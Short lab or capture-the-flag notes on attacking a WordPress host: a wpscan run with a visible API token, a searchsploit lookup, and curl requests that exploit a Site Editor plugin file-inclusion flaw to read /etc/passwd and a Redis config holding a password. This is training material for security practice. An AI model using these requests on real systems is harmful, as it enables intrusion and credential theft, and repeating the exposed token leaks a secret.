80

There is a wordpress website running:

Running wpscan:

wpscan --url http://192.168.159.166 --api-token qa7plsUQx372hiQc5FQUPOjcfhGUCQ2Dp8DQi4ate2k

Searching in searchsploit:

searchsploit Site Editor

Now we can exploit it:

curl http://192.168.159.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Now we can look for redis config files as it is running on port 6379

curl http://192.168.159.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf > redis.conf

Then we can find the password in the file:

Now we can use this to login to redis on port [[6379]]